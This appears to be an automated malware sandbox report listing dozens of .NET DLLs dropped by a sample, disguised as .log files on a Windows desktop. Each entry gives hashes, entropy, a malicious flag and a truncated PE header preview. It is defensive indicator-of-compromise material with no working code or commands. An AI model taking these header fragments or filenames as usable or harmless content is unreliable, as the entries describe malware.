                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kqnUARmv.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\lHqLDiMI.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\lQNLnUfF.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\lsLKjvRr.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mHEDqnlH.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mXotVngM.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mYLVFIfJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\nDreGkIL.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\nYgAqZmk.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\oOnUZAGE.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\paSjLIrf.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ppsaukgn.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\qEBmAmuq.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\qOBMMFgD.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\qcHMUuVk.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rLAuGYci.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rRaDvjLz.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rThRxFce.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rreJQTki.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rzTkgNRx.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sFNjAptf.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sIbCbYqd.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
